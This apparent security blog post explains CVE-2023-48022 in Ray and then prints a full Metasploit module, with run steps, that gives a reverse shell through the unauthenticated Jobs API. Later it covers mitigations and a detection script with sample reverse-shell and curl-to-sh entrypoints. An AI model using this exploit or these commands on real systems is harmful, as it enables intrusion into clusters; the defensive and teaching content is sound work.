Introduction
The world of distributed computing for machine learning (ML) was rattled in late 2023 by CVE-2023-48022, a critical vulnerability in the popular Ray framework. The issue is missing authentication on Ray's job submission API: anyone who can reach the API over the network can submit a job and thereby execute arbitrary code on the cluster. For security researchers and system administrators alike, understanding the details of CVE-2023-48022 is crucial to fortifying Ray deployments.
Ray in the Spotlight
Ray, developed by Anyscale, is an open-source framework that empowers developers to seamlessly scale Python applications and ML workloads across clusters. Its ability to handle complex computations with ease has garnered the attention of industry giants like Uber, Amazon, and OpenAI. However, CVE-2023-48022 cast a shadow over Ray's brilliance, highlighting a security flaw that could be exploited by malicious actors.
The Anatomy of the Attack
The vulnerability stems from Ray's Jobs API, which accepts job submissions without authentication. An attacker who can reach the API does not need to steal or forge credentials: they simply send a job submission request, and the Ray cluster runs the submitted command on the underlying system.
The Vulnerability: Missing Authentication in the Jobs API
The crux of CVE-2023-48022 is that the Jobs API performs no authentication in the affected releases. The CVE record names Ray 2.6.3 and 2.8.0, and 2.8.0 is the version used in the lab in this post. An unauthenticated attacker who can reach the dashboard port can therefore submit jobs exactly as a legitimate user would.
Here's a technical breakdown of the exploit:
Crafting the Malicious Request: The attacker constructs an HTTP POST request to the Jobs API endpoint (/api/jobs/ on the dashboard port, 8265 by default). The body is a JSON document whose entrypoint field holds the shell command to run.
Exploiting the Missing Authentication: Because the API does not ask for credentials, Ray treats the request like any other job submission and schedules it. Network access to the dashboard is all the attacker needs.
Code Execution and Shenanigans: Ray runs the entrypoint as a job on the cluster, so the attacker's command executes with the privileges of the user running Ray. From there the attacker can, for example, open a reverse shell, which is what the proof of concept in this post does.
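To make the shape of such a request concrete, here is a minimal Ruby sketch that builds, but deliberately never sends, a job submission request. The /api/jobs/ path, port 8265, and the entrypoint field are taken from the Metasploit module used later in this post; the helper name build_job_request, the loopback address, and the harmless echo command are assumptions for illustration only.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Hypothetical helper: builds (but does not send) a Jobs API submission request.
# Path, port, and field name mirror the Metasploit module in this post.
def build_job_request(host, entrypoint, port: 8265)
  uri = URI::HTTP.build(host: host, port: port, path: '/api/jobs/')
  request = Net::HTTP::Post.new(uri)
  request['Content-Type'] = 'application/json'
  request.body = JSON.generate({ 'entrypoint' => entrypoint })
  request
end

# Harmless example command; nothing is transmitted over the network here.
req = build_job_request('127.0.0.1', 'echo hello')
puts "#{req.method} #{req.path}"
puts req.body
puts "Authorization header present: #{req.key?('Authorization')}"
```

Note what is absent: the request carries no token, cookie, or Authorization header. That absence, rather than any clever encoding of the payload, is the whole vulnerability.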
Proof of Concept
First, we need a lab for this PoC. Install a vulnerable version of Ray in a virtual environment by running:
pip3 install -U "ray[default]"==2.8.0
Once Ray is installed, start the head node with the dashboard listening on all interfaces:
ray start --head --dashboard-host=0.0.0.0
We can verify that the Ray server is running by opening the dashboard on its default port, 8265.
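If you prefer to script this check, a plain TCP connection attempt is enough to tell whether something is listening on the dashboard port. This is a minimal sketch using Ruby's standard socket library; the helper name port_open? and the two-second timeout are assumptions, and an open port only shows that a listener exists, not that the listener is Ray.

```ruby
require 'socket'

# Hypothetical helper: true if a TCP connection to host:port succeeds within the timeout.
def port_open?(host, port, timeout: 2)
  Socket.tcp(host, port, connect_timeout: timeout) { true }
rescue SystemCallError, SocketError
  # Connection refused, timed out, or the host could not be resolved.
  false
end

# Check the lab machine itself; replace the address with your lab host if needed.
puts "Dashboard port reachable: #{port_open?('127.0.0.1', 8265)}"
```

Run it from the attacker machine as well as from the lab host: if the port is reachable from both, the dashboard is exposed in the way this PoC requires.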
We will use a Metasploit module to exploit this vulnerability and obtain a reverse shell on the system hosting the vulnerable Ray server.
Copy the following Metasploit module into a file; we are naming ours "ray_job_rce.rb":
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ray Agent Job RCE',
      'Description' => %q{
        RCE in Ray via the agent job submission endpoint. This is intended functionality as
        Ray's main purpose is executing arbitrary workloads.
        By default, Ray has no authentication.
      },
      'Author' => ['sierrabearchell', 'byt3bl33d3r <marcello@protectai.com>', 'Akos Jakab'],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/']
        ],
      'Platform' => 'linux',
      'Targets' => [['Automatic', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2023-11-15',
      'DefaultOptions' => {
        'RPORT' => 8265,
        'SSL' => false,
        'PAYLOAD' => 'linux/x64/shell/reverse_tcp'
      }
    ))

    register_options(
      [
        OptString.new('COMMAND', [false, 'The command to execute', '']),
      ])
  end

  def check
    # Simple check to see if target is reachable; consider enhancing based on
    # the app's specific behavior or endpoints
    res = send_request_cgi('uri' => '/')
    return res.nil? ? CheckCode::Unknown : CheckCode::Detected
  end

  # Submits cmd as the entrypoint of a new job, trying each known endpoint in turn.
  def execute_command(cmd, opts = {})
    target_uri_paths = ['/api/jobs/', '/api/job_agent/jobs/']
    target_uri_paths.each do |uri|
      begin
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => normalize_uri(uri),
          'ctype' => 'application/json',
          'data' => {'entrypoint' => cmd}.to_json
        })
        unless res
          print_error("Failed to receive response for #{uri}")
          next
        end
        if res.code == 200
          print_good("Command execution successful: #{cmd}")
          job_data = res.get_json_document
          print_status("Job ID: #{job_data['job_id']}, Submission ID: #{job_data['submission_id']}")
          return
        else
          print_error("Failed command execution for #{uri}: HTTP #{res.code}")
        end
      rescue ::Rex::ConnectionError => e
        print_error("Failed to connect to the server: #{e.message}")
        return
      end
    end
    fail_with(Failure::Unknown, "Command execution failed for all paths")
  end

  def exploit
    if datastore['COMMAND'].nil? || datastore['COMMAND'].empty?
      print_status('No custom command specified, executing reverse shell...')
      execute_cmdstager
    else
      print_status("Executing custom command: #{datastore['COMMAND']}")
      execute_command(datastore['COMMAND'])
    end
  end
end
Now copy it into Metasploit's exploits directory:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
Let's launch the Metasploit console and reload the modules so that it picks up the newly added one:
msfconsole
reload_all
Now load the exploit to perform the attack:
use exploit/multi/misc/ray_job_rce
Before launching the exploit, we need to set the options the module requires: RHOST (remote host), which is our target server, and LHOST (local host), which is our attacker machine. The port, 8265, is already set by default.
set RHOST <TARGET_IP>
set LHOST <LOCAL_IP>
With the options set, we can launch the exploit and see whether it gives us a reverse shell on the target system:
run
The Vendor Response and the Aftermath
Anyscale disputed CVE-2023-48022. Its position, recorded in the CVE entry itself, is that Ray is not intended for use outside a strictly controlled network environment, so an unauthenticated Jobs API is documented behavior rather than a bug. Upgrading Ray is still worthwhile, but it should not be treated as the fix for this issue. The effective mitigation is to keep the dashboard and the Jobs API off untrusted networks, for example by not binding the dashboard to 0.0.0.0 and by firewalling port 8265.
In March 2024, reports emerged that attackers had been actively exploiting exposed Ray clusters through this issue for months, compromising numerous deployments. This underlines the importance of network isolation, timely updates, and good security hygiene in general.
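One concrete hygiene check follows directly from the lab setup, where the dashboard was started with --dashboard-host=0.0.0.0. The Ruby sketch below extracts that flag from a ray start command line and reports whether the resulting bind address is reachable beyond loopback. Both helper names are hypothetical, and the fallback to 127.0.0.1 when the flag is omitted is an assumption about Ray's default that you should confirm for your version.

```ruby
require 'ipaddr'

# Assumption: when --dashboard-host is omitted, the dashboard binds to loopback.
DEFAULT_DASHBOARD_HOST = '127.0.0.1'

# Hypothetical helper: pull the --dashboard-host value out of a `ray start` command line.
def dashboard_host_from(command)
  match = command.match(/--dashboard-host[=\s]+(\S+)/)
  match ? match[1] : DEFAULT_DASHBOARD_HOST
end

# Hypothetical helper: true when the bind address is reachable beyond loopback.
def dashboard_exposed?(bind_host)
  return false if bind_host == 'localhost'

  !IPAddr.new(bind_host).loopback?
rescue IPAddr::Error
  # Not an IP literal (some other hostname): treat as exposed to stay on the safe side.
  true
end

command = 'ray start --head --dashboard-host=0.0.0.0'
host = dashboard_host_from(command)
puts "#{host} exposed beyond loopback: #{dashboard_exposed?(host)}"
```

A check like this only covers the bind address. A loopback-bound dashboard can still be exposed through a reverse proxy or port forward, so it complements firewall rules rather than replacing them.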
Advanced Detection Techniques
Beyond locking down network access, security researchers can employ further techniques for threat hunting and post-mortem analysis:
Log Analysis: Scrutinize Ray logs and job history for unusual job submissions, particularly those originating from external sources. Look for unexpected entrypoint commands, job types, or resource usage patterns.
Network Traffic Monitoring: Monitor network traffic for suspicious outgoing connections initiated by Ray processes. Connections to unexpected remote hosts can indicate a reverse shell or a payload download.
Code Analysis: Analyze the Ray codebase, particularly the components handling the Jobs API, to identify other endpoints that accept unauthenticated requests.
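As a starting point for the log analysis idea, the following Ruby sketch flags job records whose entrypoint looks like a shell trick rather than a workload. It assumes the job history has already been exported into an array of hashes with submission_id and entrypoint keys (the field names used by the Metasploit module in this post). The record layout, the helper name suspicious_jobs, the sample data, and the pattern list are all illustrative assumptions, not a complete detection rule set.

```ruby
# Illustrative patterns only; tune them for your environment.
SUSPICIOUS_PATTERNS = [
  %r{/dev/tcp/},                          # bash reverse shell idiom
  /\b(?:nc|ncat)\b.*\s-e\b/,              # netcat spawning a program
  /\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b/,  # download piped straight into a shell
  /base64\s+(?:-d|--decode)/              # decoding an embedded payload
].freeze

# Hypothetical helper: returns the job records whose entrypoint matches any pattern.
def suspicious_jobs(jobs)
  jobs.select do |job|
    entrypoint = job.fetch('entrypoint', '').to_s
    SUSPICIOUS_PATTERNS.any? { |pattern| entrypoint.match?(pattern) }
  end
end

# Made-up sample records; 203.0.113.5 is a documentation-only address.
jobs = [
  { 'submission_id' => 'raysubmit_example1', 'entrypoint' => 'python train.py --epochs 10' },
  { 'submission_id' => 'raysubmit_example2', 'entrypoint' => 'bash -c "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"' },
  { 'submission_id' => 'raysubmit_example3', 'entrypoint' => 'curl http://203.0.113.5/x.sh | sh' }
]

flagged = suspicious_jobs(jobs).map { |job| job['submission_id'] }
puts "Flagged submissions: #{flagged.join(', ')}"
```

Pattern matching like this will miss obfuscated commands and may flag legitimate jobs, so treat a hit as a prompt for manual review rather than as proof of compromise.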
Conclusion
CVE-2023-48022 serves as a wake-up call for the security community. By understanding the technical details of this vulnerability, security researchers can develop better detection and mitigation strategies. System administrators, in turn, can use this knowledge to fortify their Ray deployments and safeguard critical ML workloads. By working together, we can create a more secure environment for distributed computing and ML.
Disclaimer
The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2023-48022 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.
It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.